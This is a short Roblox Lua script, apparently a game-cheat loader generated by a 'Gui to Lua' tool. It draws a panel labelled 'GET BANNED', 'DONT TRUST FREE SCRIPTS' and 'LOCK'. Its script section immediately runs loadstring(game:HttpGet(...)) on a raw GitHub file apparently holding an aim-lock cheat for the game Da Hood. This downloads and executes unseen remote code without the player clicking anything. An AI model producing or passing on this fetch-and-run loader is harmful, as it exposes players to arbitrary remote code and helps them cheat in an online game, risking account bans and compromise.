-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextBox = Instance.new("TextBox")
local TextBox_2 = Instance.new("TextBox")
local TextButton = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BackgroundTransparency = 0.200
Frame.Position = UDim2.new(0.0554870516, 0, -0.0476758108, 0)
Frame.Size = UDim2.new(0, 330, 0, 760)

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
TextBox.Size = UDim2.new(0, 330, 0, 315)
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = "GET BANNED "
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

TextBox_2.Parent = Frame
TextBox_2.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
TextBox_2.Position = UDim2.new(0, 0, 0.414473683, 0)
TextBox_2.Size = UDim2.new(0, 330, 0, 235)
TextBox_2.Font = Enum.Font.SourceSans
TextBox_2.Text = "DONT TRUST FREE SCRIPTS"
TextBox_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox_2.TextScaled = true
TextBox_2.TextSize = 14.000
TextBox_2.TextWrapped = true

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.Position = UDim2.new(0, 0, 0.723684192, 0)
TextButton.Size = UDim2.new(0, 330, 0, 210)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "LOCK"
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true

-- Scripts:

local function EIHSIGB_fake_script() -- TextButton.Script 
	local script = Instance.new('Script', TextButton)

	loadstring(game:HttpGet("https://raw.githubusercontent.com/racemodex/my-scripts/master/dahoodaimlock", true))()
end
coroutine.wrap(EIHSIGB_fake_script)()
